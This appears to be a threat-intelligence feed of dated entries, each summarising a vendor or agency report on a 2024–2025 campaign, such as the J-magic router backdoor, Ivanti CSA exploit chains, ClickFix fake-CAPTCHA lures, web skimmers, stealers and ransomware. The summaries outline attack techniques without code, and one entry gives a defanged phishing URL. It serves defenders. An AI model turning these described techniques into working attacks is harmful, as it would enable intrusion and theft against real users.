Black Lotus Labs has uncovered a malware campaign, dubbed "J-magic," targeting Juniper enterprise-grade routers with a custom variant of the open-source backdoor tool, cd00r. This malware leverages "magic packets" to stealthily establish reverse shells on compromised devices, enabling attackers to exfiltrate data and maintain long-term access. Operating primarily in-memory, J-magic evades detection and takes advantage of routers' extended uptime and limited monitoring. The campaign, active from mid-2023 to at least mid-2024, has affected organizations across verticals like semiconductor, energy, and manufacturing, with a particular focus on routers serving as VPN gateways. While similarities exist with the SeaSpy malware, J-magic demonstrates advanced tradecraft with unique features such as an RSA challenge to secure remote access.
Source: https://blog.lumen.com/the-j-magic-show-magic-packets-and-where-to-find-them/
2025-02-10
Threat_Actors_Chained_Vulnerabilities_IvantiCSA
MEDIUM
Intel Source:
CISA
Intel Name:
Threat_Actors_Chained_Vulnerabilities_IvantiCSA
Date of Scan:
2025-02-10
Impact:
MEDIUM
Summary:
CISA and the FBI have issued a joint advisory regarding the exploitation of multiple vulnerabilities in Ivanti Cloud Service Appliances (CSA). Threat actors exploited CVE-2024-8963, CVE-2024-9379, CVE-2024-8190, and CVE-2024-9380 in September 2024 to gain initial access, execute remote code, steal credentials, and deploy webshells. These vulnerabilities were exploited in chained attacks targeting Ivanti CSA versions 4.6 (end-of-life) and certain 5.0.x versions. Exploits included administrative bypass, SQL injection, and command injection. Organizations using affected versions are urged to upgrade to the latest supported version and assume credentials stored on compromised appliances are exposed.
Source: https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-022a
2025-02-10
Hunting_WebBased_Credit_Card_Skimmers
LOW
Intel Source:
gi7w0rm
Intel Name:
Hunting_WebBased_Credit_Card_Skimmers
Date of Scan:
2025-02-10
Impact:
LOW
Summary:
gi7w0rm explores techniques for detecting and analyzing web-based credit card skimmers—malicious scripts that target e-commerce websites to steal payment details during online transactions. The author explains how attackers exploit vulnerabilities or steal credentials to inject JavaScript that mimics legitimate payment forms, secretly capturing sensitive information. Tools like Urlscan.io, CyberChef, and Validin are highlighted for their effectiveness in identifying compromised websites and deobfuscating malicious code. A case study illustrates how a WordPress vulnerability was used to inject a skimmer that stole payment data by replacing authentic payment fields with fake ones.
Source: https://gi7w0rm.medium.com/a-beginner-s-guide-to-hunting-web-based-credit-card-skimmers-c820aeee87d6
2025-02-09
NetSupport_RAT_Clickfix_Distribution
LOW
Intel Source:
ESentire
Intel Name:
NetSupport_RAT_Clickfix_Distribution
Date of Scan:
2025-02-09
Impact:
LOW
Summary:
eSentire researchers have observed an increase in attacks involving NetSupport RAT. The attackers use the ClickFix tactic to trick users into running malicious PowerShell commands. This method involves fake CAPTCHA verification pages on compromised websites that instruct users to copy and execute specific commands which download and install the NetSupport RAT malware. The malware enables attackers to spy on victims in real time, take screenshots, record audio and video, and transfer files.
Source: https://www.esentire.com/security-advisories/netsupport-rat-clickfix-distribution
2025-02-09
Polymorphic_Python_Script_Avoids_Detection
LOW
Intel Source:
ISC.SANS
Intel Name:
Polymorphic_Python_Script_Avoids_Detection
Date of Scan:
2025-02-09
Impact:
LOW
Summary:
Researchers at ISC SANS have identified a malicious Python script that uses creative anti-debugging tactics to avoid inspection. The script employs multi-threading to conduct numerous evasion strategies concurrently, such as debugger detection, API hook analysis, memory integrity verification, and self-modifying code.
Source: https://isc.sans.edu/diary/rss/31658
2025-02-08
Mimic_Tax_Agencies_Targets_Financial_Entities
MEDIUM
Intel Source:
Proofpoint
Intel Name:
Mimic_Tax_Agencies_Targets_Financial_Entities
Date of Scan:
2025-02-08
Impact:
MEDIUM
Summary:
Proofpoint researchers have uncovered a phishing campaign in which threat actors target financial organizations and individuals worldwide to take advantage of the tax-filing period. They send phishing emails impersonating legitimate tax agencies and services such as HM Revenue & Customs (HMRC) in the UK, Intuit in the US and myGov in Australia. These emails use tax-related themes like overdue payments, tax refunds and account updates to trick people into opening them. The emails either lead to fake websites that harvest credentials or contain malicious attachments that install malware like Rhadamanthys on the victim's system.
Source: https://www.proofpoint.com/us/blog/threat-insight/security-brief-threat-actors-take-taxes-account?utm_source=social_organic&utm_social_network=twitter&utm_campaign=2025&utm_post_id=ea59ad2c-af76-4242-9e8d-3947e3db8856
2025-02-08
10K_WordPressSites_Delivering_Malware
MEDIUM
Intel Source:
c/side
Intel Name:
10K_WordPressSites_Delivering_Malware
Date of Scan:
2025-02-08
Impact:
MEDIUM
Summary:
Over 10,000 WordPress websites have been compromised to deliver malware targeting both macOS and Windows users. Attackers inject a malicious JavaScript file into outdated WordPress sites, generating fake Google browser update pages via an iframe. This campaign delivers AMOS (Atomic macOS Stealer) for Apple users and SocGholish for Windows users—malware previously thought to be distributed by separate groups. The infection spreads through vulnerable WordPress plugins, making detection difficult.
Source: https://cside.dev/blog/10-000-wordpress-websites-found-delivering-macos-and-microsoft-malware
2025-02-08
APT_37_Targeting_K_Messenger
LOW
Intel Source:
Genians
Intel Name:
APT_37_Targeting_K_Messenger
Date of Scan:
2025-02-08
Impact:
LOW
Summary:
Researchers from Genians have uncovered APT37, also known as ScarCruft or Reaper, targeting a group chat platform called K Messenger to spread malicious LNK files. These files are hidden inside ZIP archives and given deceptive names such as "Changes in Chinese Government's North Korea Policy.zip" to trick victims into opening them. Once the victim clicks the LNK file, it silently executes a hidden PowerShell command that triggers a chain of infections. This eventually installs the RokRAT malware, which can steal data, take screenshots and run commands on the compromised system.
Source: https://www.genians.co.kr/blog/threat_intelligence/k-messenger
2025-02-08
XE_Group_Exploits_VeraCore_Flaws
LOW
Intel Source:
Intezer
Intel Name:
XE_Group_Exploits_VeraCore_Flaws
Date of Scan:
2025-02-08
Impact:
LOW
Summary:
Researchers at Intezer have found that XE Group, a sophisticated cybercrime group operating since 2013, has shifted its techniques from credit card skimming to targeted information theft. Their most recent actions involve exploiting two zero-day vulnerabilities in VeraCore software (CVE-2024-57968, CVSS 9.9, and CVE-2025-25181, CVSS 5.8) to build webshells and keep persistent access to affected computers.
Source: https://intezer.com/blog/research/xe-group-exploiting-zero-days/
2025-02-08
MacOS_Flexible_Ferret
MEDIUM
Intel Source:
SentinelLabs
Intel Name:
MacOS_Flexible_Ferret
Date of Scan:
2025-02-08
Impact:
MEDIUM
Summary:
Researchers from SentinelLabs have identified a new malware called FlexibleFerret targeting macOS users while evading Apple's detection tool XProtect. This malware is linked to the North Korean campaign called Contagious Interview, in which attackers use deceptive tactics to lure job seekers into installing malicious software such as VCam or Camera Access. FlexibleFerret is delivered through a malicious Apple Installer package whose components work together to execute the malware, allowing the attackers to steal information or gain control over the infected macOS system.
Source: https://www.sentinelone.com/blog/macos-flexibleferret-further-variants-of-dprk-malware-family-unearthed/
2025-02-08
Fake_Cisco_Ad_Spreads_NetSupport_RAT
LOW
Intel Source:
Malwarebytes
Intel Name:
Fake_Cisco_Ad_Spreads_NetSupport_RAT
Date of Scan:
2025-02-08
Impact:
LOW
Summary:
Researchers at Malwarebytes have found a malicious campaign that used Google ads to spread a fake Cisco AnyConnect installer containing the NetSupport RAT. Threat actors copied a German university's website, not to deceive people directly, but to avoid ad detection systems. Users who searched for Cisco AnyConnect were routed to a fake Cisco copycat website that hosted the malware.
Source: https://www.malwarebytes.com/blog/news/2025/02/university-site-cloned-to-evade-ad-detection-distributes-fake-cisco-installer
2025-02-07
Attackers_Targeting_Govt_and_Education_Entities
LOW
Intel Source:
Hunt.IO
Intel Name:
Attackers_Targeting_Govt_and_Education_Entities
Date of Scan:
2025-02-07
Impact:
LOW
Summary:
Researchers from Hunt.IO identified a threat group named GreenSpot that has been active since 2007. The group is believed to be operating from Taiwan and primarily targets government, academic and military-related organisations in China. It uses phishing tactics, creating fake websites that resemble legitimate email services like Netease Mail to trick users into entering their credentials. When users enter their credentials on these fake sites, the attackers steal their login details and gain unauthorised access to their accounts.
Source: https://hunt.io/blog/greenspot-apt-targets-163com-fake-downloads-spoofing
2025-02-07
StealingSeconds_WebsiteSkimmers
MEDIUM
Intel Source:
JScrambler
Intel Name:
StealingSeconds_WebsiteSkimmers
Date of Scan:
2025-02-07
Impact:
MEDIUM
Summary:
A recent investigation uncovered a web skimming attack affecting multiple websites, including Casio UK’s online store. The attack, exploiting vulnerabilities in Magento-based web stores, involved a two-stage skimmer that harvested sensitive customer data through an elaborate fake checkout process. Unlike typical skimmers that target only checkout pages, this one operated on all pages except the final checkout step, capturing personal and payment details before redirecting users to the legitimate page. The stolen data was encrypted and sent to a Russian-hosted server, suggesting an organized cybercriminal operation. Casio UK had a Content Security Policy (CSP) in place, but its ineffective configuration failed to prevent the attack.
Source: https://jscrambler.com/blog/stealing-seconds-web-skimmer-compromises-websites
2025-02-07
FLESH_STEALER
LOW
Intel Source:
Cyfirma
Intel Name:
FLESH_STEALER
Date of Scan:
2025-02-07
Impact:
LOW
Summary:
Cyfirma researchers have uncovered Flesh Stealer, a malware designed to steal sensitive information from compromised systems. It was developed by a Russian-speaking individual and includes features such as anti-debugging and anti-VM capabilities. The malware first appeared in August 2024 and has been promoted on multiple platforms like Discord and Telegram and on underground forums like Pyrex Guru. Flesh Stealer primarily targets popular web browsers such as Chrome, Firefox, Opera, and Edge to steal stored credentials, cookies, and browsing history.
Source: https://www.cyfirma.com/research/flesh-stealer-unmasking-the-blue-masked-thief/
2025-02-07
Stealthy_Malware_Bypasses_Chrome_Encryption
LOW
Intel Source:
Cyble
Intel Name:
Stealthy_Malware_Bypasses_Chrome_Encryption
Date of Scan:
2025-02-07
Impact:
LOW
Summary:
Researchers from Cyble have found stealthy malware that can bypass Chrome's App-Bound Encryption via dual injection tactics. The malware is deployed as a ZIP archive containing an LNK file disguised as a PDF and an XML project file disguised as a PNG, and is aimed at Vietnamese enterprises, notably those in the telemarketing or sales sectors.
Source: https://cyble.com/blog/dual-injection-undermines-chromes-encryption/
2025-02-07
ClickFix_Tactics_in_DarkGate_Campaigns
LOW
Intel Source:
Malwarebytes
Intel Name:
ClickFix_Tactics_in_DarkGate_Campaigns
Date of Scan:
2025-02-07
Impact:
LOW
Summary:
Researchers at Malwarebytes have discovered a new DarkGate malvertising operation that uses both the "ClickFix" approach and standard file downloads. ClickFix uses bogus CAPTCHA or traffic validation sites to entice visitors to paste and execute code, whereas previous techniques rely on malware-laden installers. This operation, which targets the Notion brand using malicious Google advertisements, indicates that threat actors are likely watching conversion metrics to see which strategy results in more effective malware infections.
Source: http://malwarebytes.com/blog/news/2025/01/clickfix-vs-traditional-download-in-new-darkgate-campaign
2025-02-07
KimsukyGroup_Using_RDP_Wrapper
MEDIUM
Intel Source:
ASEC
Intel Name:
KimsukyGroup_Using_RDP_Wrapper
Date of Scan:
2025-02-07
Impact:
MEDIUM
Summary:
The Kimsuky cyber threat group continues to conduct spear-phishing attacks, distributing malware disguised as document files to gain control of targeted systems. Their attacks leverage malicious shortcut files (*.LNK) that execute PowerShell commands to install malware such as the PebbleDash backdoor and a custom RDP Wrapper, which enables remote access. The group also employs proxy tools to bypass network restrictions, keyloggers to capture user inputs, and information-stealing malware that extracts credentials from web browsers. Recent attacks indicate a shift towards remote control tools rather than backdoors.
Source: https://asec.ahnlab.com/en/86098/
2025-02-07
Hugging_Face_Malware_Threat
LOW
Intel Source:
Reversing Labs
Intel Name:
Hugging_Face_Malware_Threat
Date of Scan:
2025-02-07
Impact:
LOW
Summary:
Researchers at ReversingLabs have found a novel approach used by threat actors to deliver malware via the Hugging Face platform by exploiting Pickle file serialization. Pickle, a popular Python module for serializing ML model data, is dangerous because it permits arbitrary code execution during deserialization. Despite previous warnings and guidance highlighting these concerns, it remains popular due to its ease of use.
Source: https://www.reversinglabs.com/blog/rl-identifies-malware-ml-model-hosted-on-hugging-face
2025-02-07
Abyss_Locker_Ransomware
MEDIUM
Intel Source:
Sygnia
Intel Name:
Abyss_Locker_Ransomware
Date of Scan:
2025-02-07
Impact:
MEDIUM
Summary:
Sygnia researchers have identified a ransomware group dubbed Abyss Locker that emerged in 2023 and continued its attacks in 2024, leveraging ransomware to cripple victims. The group targets critical infrastructure such as VPN appliances, network-attached storage (NAS) devices, and ESXi servers to establish a foothold within the victim's network. It begins its attacks by exploiting vulnerabilities in unpatched VPN appliances to gain initial access; in particular, it has been exploiting a known vulnerability (CVE-2021-20038) in SonicWall VPN devices. After compromising the devices and network, the group deploys ransomware to encrypt the data.
Source: https://www.sygnia.co/blog/abyss-locker-ransomware-attack-analysis/
2025-02-06
ReverseEngineering_of_ELF_SshdinjectorAtr
MEDIUM
Intel Source:
Fortiguard Labs
Intel Name:
ReverseEngineering_of_ELF_SshdinjectorAtr
Date of Scan:
2025-02-06
Impact:
MEDIUM
Summary:
FortiGuard Labs analyzed ELF/Sshdinjector.A!tr, a Linux-based malware targeting network appliances and IoT devices for data exfiltration. Linked to the DaggerFly espionage group and the Lunar Peek campaign, the malware injects itself into the SSH daemon, maintaining persistence through infected binaries and communicating with a remote command-and-control (C2) server. Researchers reverse-engineered its components using Radare2 and AI-assisted analysis via r2ai. While AI provided efficient summaries and readable source code, it also introduced errors such as hallucinations, exaggerations, and omissions, underscoring the need for human oversight.
Source: https://www.fortinet.com/blog/threat-research/analyzing-elf-sshdinjector-with-a-human-and-artificial-analyst
2025-02-06
NetflixThemed_Survey_Phishing_Campaign
MEDIUM
Intel Source:
Unit 42
Intel Name:
NetflixThemed_Survey_Phishing_Campaign
Date of Scan:
2025-02-06
Impact:
MEDIUM
Summary:
Unit 42 identified a recent phishing campaign that exploits fake Netflix-themed surveys to steal credit card information. The scam lures users into completing a survey, which then redirects them to a fraudulent payment page requesting credit card details. Users who provide their information are sent to a fake "winner" page, while those who ignore the survey are redirected to another scam site after two minutes. The domain showed increased activity in December 2024 and January 2025, likely tied to this phishing operation.
Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2025-02-03-IOCs-for-Netflix-themed-survey-phishing-campaign.txt
2025-02-06
ValleyRAT_Targets_Financial_Organizations
LOW
Intel Source:
Morphisec Labs
Intel Name:
ValleyRAT_Targets_Financial_Organizations
Date of Scan:
2025-02-06
Impact:
LOW
Summary:
Morphisec Labs researchers discovered a campaign delivering the ValleyRAT malware, linked to the Silver Fox APT group. The campaign specifically targets the finance and accounting departments of organisations. The attackers use phishing websites to distribute the malware: one, https[://]anizom[.]com/, lures users into downloading a fake Chrome browser, while another impersonates a Chinese telecom company called Karlos and delivers malicious files. When users extract and run these files, the malware requests elevated privileges to gain administrative access to the system.
Source: https://www.morphisec.com/blog/rat-race-valleyrat-malware-china/?utm_content=323764605&utm_medium=social&utm_source=twitter&hss_channel=tw-2965779277
2025-02-04
AsyncRAT_Abusing_Python_and_TryCloudflare
LOW
Intel Source:
ForcePoint
Intel Name:
AsyncRAT_Abusing_Python_and_TryCloudflare
Date of Scan:
2025-02-04
Impact:
LOW
Summary:
Forcepoint Labs has uncovered a new AsyncRAT malware campaign abusing TryCloudflare and malicious Python packages. The attackers send phishing emails containing a Dropbox link that downloads a ZIP file holding a .URL file. The .URL file redirects to an .LNK file, which executes JavaScript that downloads the AsyncRAT malware, giving attackers full control over the compromised system.
Source: https://www.forcepoint.com/blog/x-labs/asyncrat-reloaded-python-trycloudflare-malware
2025-02-03
High_Profile_Account_Targeting_on_Twitter
LOW
Intel Source:
SentinelOne
Intel Name:
High_Profile_Account_Targeting_on_Twitter
Date of Scan:
2025-02-03
Impact:
LOW
Summary:
Researchers from SentinelLabs have uncovered a phishing campaign targeting Twitter account holders in order to hijack their accounts for fraudulent activity. The attackers target U.S. political figures, international journalists, X employees, cryptocurrency organizations and other platforms to steal money from unsuspecting victims, focusing mainly on high-profile Twitter accounts. The campaign uses two tactics to deceive users: fake account-login notices delivered via email, and copyright-violation warnings that trick users into clicking malicious links. Once they take over an account, the attackers immediately lock it and start posting fraudulent cryptocurrency investment opportunities for financial gain.
Source: https://www.sentinelone.com/labs/phishing-on-x-high-profile-account-targeting-campaign-returns/
2025-02-03
Operation_Phantom_Circuit
MEDIUM
Intel Source:
SecurityScorecard
Intel Name:
Operation_Phantom_Circuit
Date of Scan:
2025-02-03
Impact:
MEDIUM
Summary:
In December 2024, the North Korea-linked Lazarus Group launched "Operation Phantom Circuit," a sophisticated cyberattack targeting cryptocurrency and technology developers worldwide. By embedding malware into trusted development tools, the group compromised over 1,500 systems across multiple attack waves. STRIKE’s investigation revealed an elaborate infrastructure involving proxy servers in Hasan, Russia, command-and-control servers, and persistent remote access sessions to exfiltrate sensitive data. Attackers employed VPNs and commercial proxy networks to obfuscate their origins, routing traffic through Russian-based Oculus Proxy nodes before reaching their command centers. The stolen data—including credentials, authentication tokens, and system configurations—was ultimately stored on Dropbox.
Source: https://securityscorecard.com/blog/operation-phantom-circuit-north-koreas-global-data-exfiltration-campaign/
2025-02-02
New_Aquabotv3_Malware_Targets_Mitel_SIP_Phones
LOW
Intel Source:
Akamai
Intel Name:
New_Aquabotv3_Malware_Targets_Mitel_SIP_Phones
Date of Scan:
2025-02-02
Impact:
LOW
Summary:
Akamai researchers have discovered a new variant of the Mirai-based malware Aquabotv3. This variant targets Mitel SIP phones by exploiting CVE-2024-41710, a command injection vulnerability. This new version introduces a unique function, report_kill, which notifies the command and control (C2) server when a kill signal is detected on the infected device. As of the latest update, no response has been observed from C2.
Source: https://www.akamai.com/blog/security-research/2025-january-new-aquabot-mirai-variant-exploiting-mitel-phones
2025-02-02
Windows_Locker_Ransomware_Insight
LOW
Intel Source:
Cyfirma
Intel Name:
Windows_Locker_Ransomware_Insight
Date of Scan:
2025-02-02
Impact:
LOW
Summary:
Researchers at CYFIRMA have discovered a new ransomware called "Windows Locker," which encrypts victims' files and appends the .winlocker extension. After infection, it drops a ransom note called Readme.txt, which instructs victims to contact the attacker or an authorized administrator for payment and decryption. This malware, written in .NET, first appeared in December 2024 and has since been widely distributed via GitHub.
Source: https://www.cyfirma.com/research/windows-locker-ransomware/
2025-02-02
Malicious_Domains_Impersonate_Tax_Agencies
LOW
Intel Source:
Proofpoint
Intel Name:
Malicious_Domains_Impersonate_Tax_Agencies
Date of Scan:
2025-02-02
Impact:
LOW
Summary:
Researchers at Proofpoint have detected a rise in scams and malicious websites mimicking tax agencies and financial companies, coinciding with tax season in the United Kingdom and the United States. Attackers have used tax-related topics to spoof government agencies and financial institutions, attempting to trick users into engaging with fake information.
Source: https://www.proofpoint.com/us/blog/threat-insight/security-brief-threat-actors-take-taxes-account
2025-02-02
CL_STA_0048_Targeting_South_Asia
LOW
Intel Source:
Palo Alto
Intel Name:
CL_STA_0048_Targeting_South_Asia
Date of Scan:
2025-02-02
Impact:
LOW
Summary:
Researchers at Palo Alto Networks have discovered an espionage effort known as CL-STA-0048 that targeted high-value entities in South Asia, including a telecommunications corporation. The attackers used uncommon approaches such as Hex Staging for payload delivery, DNS exfiltration via ping, and SQLcmd misuse for data theft. Based on the methods, tools, infrastructure, and victimology, the activity is believed to originate in China with moderate-high confidence.
Source: https://unit42.paloaltonetworks.com/espionage-campaign-targets-south-asian-entities/
2025-02-02
Lumma_Stealer_GitHub_Based_Delivery
LOW
Intel Source:
Trend Micro
Intel Name:
Lumma_Stealer_GitHub_Based_Delivery
Date of Scan:
2025-02-02
Impact:
LOW
Summary:
Trend Micro researchers have discovered a sophisticated campaign distributing Lumma Stealer malware via GitHub's release infrastructure. The attackers exploited GitHub as a trusted platform to deliver the malware, which then deployed additional threats like SectopRAT, Vidar, Cobeacon, and another Lumma Stealer variant. The campaign shows ties to the Stargazer Goblin group, known for using compromised websites and GitHub repositories to distribute malicious payloads, highlighting the group's evolving tactics.
Source: https://www.trendmicro.com/en_us/research/25/a/lumma-stealers-github-based-delivery-via-mdr.html
2025-02-01
Email_Bombing_Campaign
LOW
Intel Source:
ESentire
Intel Name:
Email_Bombing_Campaign
Date of Scan:
2025-02-01
Impact:
LOW
Summary:
eSentire researchers have identified a campaign in which attackers use an email-bombing tactic to compromise organisations. Recipients first receive a massive flood of spam emails, and shortly afterwards they get a message on Microsoft Teams from a fake IT support team that takes advantage of MS Teams settings. The fake IT team claims it can fix the issue and requests a remote session. Once the victim agrees to the session, the attackers gain control of the system and silently install malware that allows them to persist in the environment, steal credentials, exfiltrate sensitive data and potentially deploy ransomware.
Source: https://www.esentire.com/security-advisories/ongoing-email-bombing-campaigns-leading-to-remote-access-and-post-exploitation
2025-02-01
GamaCopy_Targets_Russian_Entities
MEDIUM
Intel Source:
knownsec 404
Intel Name:
GamaCopy_Targets_Russian_Entities
Date of Scan:
2025-02-01
Impact:
MEDIUM
Summary:
Researchers from the Knownsec 404 Advanced Threat Intelligence team have discovered a threat actor known as "GamaCopy," who is copying the tactics of the Russian-linked Gamaredon gang to conduct attacks against Russian-speaking targets. Using military-related content as bait, the attackers use 7z self-extracting programs to deliver payloads and then use open-source tools like UltraVNC for further action.
Source: https://paper.seebug.org/3270/
2025-02-01
Clipboard_Hijacker_Delivers_Lumma_Stealer
LOW
Intel Source:
Threatdown
Intel Name:
Clipboard_Hijacker_Delivers_Lumma_Stealer
Date of Scan:
2025-02-01
Impact:
LOW
Summary:
Researchers from Threatdown have observed cybercriminals leveraging clipboard hijacking and fake CAPTCHAs to trick users into executing malicious commands. The attackers place fake CAPTCHAs on fraudulent websites, including fake online stores, news sites and platforms offering music and movies. They deliver Lumma Stealer using a malicious command copied to the clipboard, which relies on the MSHTA tool to download and run a PowerShell script hidden in an image file called Nusku.jpeg.
Source: https://www.threatdown.com/blog/more-cybercriminals-are-using-the-clipboard-hijacker-method/
2025-02-01
HellCat_and_Morpheus_RaaS_Operators
MEDIUM
Intel Source:
SentinelOne
Intel Name:
HellCat_and_Morpheus_RaaS_Operators
Date of Scan:
2025-02-01
Impact:
MEDIUM
Summary:
SentinelOne researchers have observed the rise of two prominent RaaS operations called HellCat and Morpheus. These operations let affiliates use pre-built ransomware tooling in exchange for a share of the profits. HellCat first appeared in mid-2024 and aims to establish a strong position in the cybercrime arena. It is operated by members of the BreachForums community such as Rey, Pryx, Grep and IntelBroker, and primarily targets government entities. Morpheus, on the other hand, launched its data leak site in December 2024 and operates as a semi-private RaaS. It targets the pharmaceutical and manufacturing sectors, with a particular focus on exploiting VMware ESXi environments.
Source: https://www.sentinelone.com/blog/hellcat-and-morpheus-two-brands-one-payload-as-ransomware-affiliates-drop-identical-code/
2025-01-31
Exploitation_of_CVE_2019_18935_in_IIS
MEDIUM
Intel Source:
Esentire
Intel Name:
Exploitation_of_CVE_2019_18935_in_IIS
Date of Scan:
2025-01-31
Impact:
MEDIUM
Summary:
Researchers at eSentire have found threat actors who are abusing CVE-2019-18935, a six-year-old vulnerability in Progress Telerik UI for ASP.NET AJAX. In early January 2025, eSentire's Threat Response Unit discovered attackers utilizing the IIS worker process (w3wp.exe) to load a reverse shell and run reconnaissance commands via cmd.exe. Before gaining remote access, the attackers analyzed IIS logs for a weak file upload handler and used a tailored proof-of-concept (PoC) exploit.
Source: https://www.esentire.com/blog/threat-actors-use-cve-2019-18935-to-deliver-reverse-shells-and-juicypotatong-privilege-escalation-tool
2025-01-31
DeepSeek_Crypo_Phishing_Scams
LOW
Intel Source:
Cyble
Intel Name:
DeepSeek_Crypo_Phishing_Scams
Date of Scan:
2025-01-31
Impact:
LOW
Summary:
Cyble researchers have uncovered a new campaign involving multiple fraudulent websites impersonating DeepSeek as part of cryptocurrency phishing schemes and investment scams. DeepSeek is a Chinese AI company that recently launched its chatbot, DeepSeek – AI Assistant. The attackers are taking advantage of its popularity by creating deceptive websites that closely mimic the legitimate DeepSeek platform to lure users into scanning a QR code to connect cryptocurrency wallets such as MetaMask or WalletConnect. When a user scans the QR code, their wallet credentials are stolen, leading to complete loss of their funds.
Source: https://cyble.com/blog/deepseeks-growing-influence-sparks-a-surge-in-frauds-and-phishing-attacks/
2025-01-31
Phishing_Attacks_Exploit_Cloudflare
LOW
Intel Source:
cloudsek
Intel Name:
Phishing_Attacks_Exploit_Cloudflare
Date of Scan:
2025-01-31
Impact:
LOW
Summary:
Researchers from the CloudSEK Threat Research Team have found a phishing page that can impersonate any brand while stealing user credentials via a generic login interface. The phishing site, hosted on Cloudflare's workers.dev, tailors each lure by embedding the target employee's email address in the URL, enabling targeted campaigns. To trick victims, the site takes a screenshot of the domain associated with the target's email address (via thum.io) and displays it as the page background.
Source: https://www.cloudsek.com/blog/unmasking-cyber-deception-the-rise-of-generic-phishing-pages-targeting-multiple-brands
2025-01-31
Coyote_Banking_Trojan
LOW
Intel Source:
Fortinet
Intel Name:
Coyote_Banking_Trojan
Date of Scan:
2025-01-31
Impact:
LOW
Summary:
Researchers from Fortinet have identified several malicious LNK files that use PowerShell commands to execute malicious scripts and connect to remote servers to deliver the Coyote Banking Trojan. The trojan mainly targets Brazil and aims to steal sensitive information from over 70 financial applications and numerous websites. Once deployed on a victim's system, it performs multiple malicious activities such as keylogging, taking screenshots and displaying fake login pages to lure users into entering their banking credentials, which lets cybercriminals access users' banking accounts and steal financial data.
Source: https://www.fortinet.com/blog/threat-research/coyote-banking-trojan-a-stealthy-attack-via-lnk-files
2025-01-31
UAC_0063_Cyber_Espionage_Unveiled
LOW
Intel Source:
Bitdefender
Intel Name:
UAC_0063_Cyber_Espionage_Unveiled
Date of Scan:
2025-01-31
Impact:
LOW
Summary:
Researchers at Bitdefender have discovered a sophisticated cyber-espionage operation by UAC-0063, a threat group that is spreading its activities from Central Asia to European countries. This actor initially targeted government entities and diplomatic missions in Central Asia, but has now expanded its scope to include embassies in Germany, the United Kingdom, the Netherlands, Romania, and Georgia.
Source: https://www.bitdefender.com/en-us/blog/businessinsights/uac-0063-cyber-espionage-operation-expanding-from-central-asia
2025-01-31
Fake_CAPTCHA_Scam_Targets_Crypto_Users
LOW
Intel Source:
Morphisec
Intel Name:
Fake_CAPTCHA_Scam_Targets_Crypto_Users
Date of Scan:
2025-01-31
Impact:
LOW
Summary:
Researchers from Morphisec have discovered a new operation in which fraudsters exploit false CAPTCHA verification systems to send malware to cryptocurrency groups. The attack begins on the X platform (previously Twitter), where threat actors hijack legitimate threads to trick users into joining Telegram groups. Once entered, victims are encouraged to pass a CAPTCHA with a bot that looks like "Safeguard," which results in the distribution of Lumma Stealer malware via loaders such as IDAT Loader and Emmenthal Loader.
Source: https://www.morphisec.com/blog/captcha-chaos-lumma-stealer/
2025-01-31
From_PowerShell_to_a_Python_Obfuscation_Race
LOW
Intel Source:
ISC.SANS
Intel Name:
From_PowerShell_to_a_Python_Obfuscation_Race
Date of Scan:
2025-01-31
Impact:
LOW
Summary:
The malware uses PowerShell to download a fake document and set up a Python environment. It then deploys an InfoStealer that targets cryptocurrency wallet extensions in browsers, exfiltrating data via Telegram bots. The malware is heavily obfuscated with multiple layers of encoding and encryption to evade detection. Key indicators include malicious PowerShell scripts, Python environment setup, and cryptocurrency theft via clipboard hijacking and wallet address replacement.
Source: https://isc.sans.edu/diary/From+PowerShell+to+a+Python+Obfuscation+Race/31634/
2025-01-30
SparkRAT_Malware_Target_Multiple_Operating_Systems
LOW
Intel Source:
Hunt.IO
Intel Name:
SparkRAT_Malware_Target_Multiple_Operating_Systems
Date of Scan:
2025-01-30
Impact:
LOW
Summary:
Researchers from Hunt.IO have uncovered SparkRAT, a remote access tool that has been available on GitHub since 2022. It is written in the Go programming language and uses the WebSocket protocol to communicate with its C2 servers. The malware is popular among cybercriminals because of its flexible design, user-friendly interface and multi-platform support for Windows, macOS and Linux systems. Its capabilities include controlling files and programs, running system commands, stealing sensitive data, taking screenshots, and even shutting down or restarting a system.
Source: https://hunt.io/blog/sparkrat-server-detection-macos-activity-and-malicious-connections
2025-01-30
Unmasking_the_Shadow_of_PoisonPlug
MEDIUM
Intel Source:
Mandiant
Intel Name:
Unmasking_the_Shadow_of_PoisonPlug
Date of Scan:
2025-01-30
Impact:
MEDIUM
Summary:
Google/Mandiant researchers have uncovered Chinese cyber-espionage operations targeting entities in Europe and the Asia-Pacific (APAC) region. These operations leverage a backdoor called POISONPLUG and a specialised variant, POISONPLUG.SHADOW. POISONPLUG is used by Chinese threat actors, but POISONPLUG.SHADOW appears to be linked to APT41. The malware is protected by an advanced obfuscator called ScatterBrain, which makes it hard to detect and analyze. ScatterBrain works in three modes: Selective, Complete and Complete Headerless, each offering a different level of obfuscation. Selective mode is used for early stages of an attack, such as droppers, while the other modes are used for more advanced components, like the final backdoor payload.
Source: https://cloud.google.com/blog/topics/threat-intelligence/scatterbrain-unmasking-poisonplug-obfuscator/
2025-01-30
Exploitation_of_HTTP_Clients_in_ATO_Attacks
MEDIUM
Intel Source:
Proofpoint
Intel Name:
Exploitation_of_HTTP_Clients_in_ATO_Attacks
Date of Scan:
2025-01-30
Impact:
MEDIUM
Summary:
Proofpoint findings reveal that 78% of Microsoft 365 tenants were targeted by account takeover attempts using distinct HTTP clients. While most attacks rely on brute force methods with low success rates, a campaign using the Axios client had a 43% success rate in compromising accounts. Researchers also identified a high-velocity brute force campaign using the Node Fetch client. Attackers are increasingly repurposing legitimate HTTP client tools, often sourced from public repositories, to carry out attacks like Adversary-in-the-Middle (AitM) and brute force techniques, leading to increased account takeover incidents.
Source: https://www.proofpoint.com/us/blog/threat-insight/http-client-tools-exploitation-account-takeover-attacks
2025-01-30
New_Phishing_Campaign_Impersonating_Amazon
LOW
Intel Source:
Palo Alto
Intel Name:
New_Phishing_Campaign_Impersonating_Amazon
Date of Scan:
2025-01-30
Impact:
LOW
Summary:
Palo Alto researchers have identified a campaign in which attackers target Amazon Prime members to steal their credit card details. The attackers send emails with malicious PDF attachments that appear legitimate. These PDFs contain links that redirect users through a series of URLs before landing on a fake Amazon page. The deceptive site is designed to trick users into entering their credit card information, which is then stolen by the attackers.
Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2025-01-24-IOCs-for-phishing-campaign-impersonating-amazon.txt
2025-01-30
Astral_Stealer
LOW
Intel Source:
Cyfirma
Intel Name:
Astral_Stealer
